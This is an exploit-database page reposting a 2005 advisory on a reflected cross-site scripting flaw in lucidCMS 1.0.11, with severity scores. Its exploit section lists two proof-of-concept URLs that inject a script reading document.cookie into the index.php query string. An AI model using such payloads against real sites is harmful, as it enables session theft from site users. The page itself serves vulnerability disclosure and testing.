Advertisement






lucidCMS 1.0.11 is susceptible to a cross site scripting attack

CVE Category Price Severity
Not available CWE-79 Not disclosed Medium
Author Risk Exploitation Type Date
Unknown High Remote 2005-10-06
CPE
cpe:cpe:/a:lucidcms:lucidcms:1.0.11
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090025

Below is a copy:

[Description]:
lucidCMS is a simple and flexible content management system for the individual or organization that wishes to manage a collection of webpages without the overhead and complexity of other available
"community" CMS options.

[version]:lucidCMS 1.0.11

[vendor]:www.lucidcms.net

[Vulnerability]: cross site script

[exploit]:
http://[host]/[cms]/index.php?<script>alert(document.cookie);</script>
http://[host]/[cms]/?<script>alert(document.cookie);</script>

.......[X1NG]..........
X1ngBox <at/> Gmail Com

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum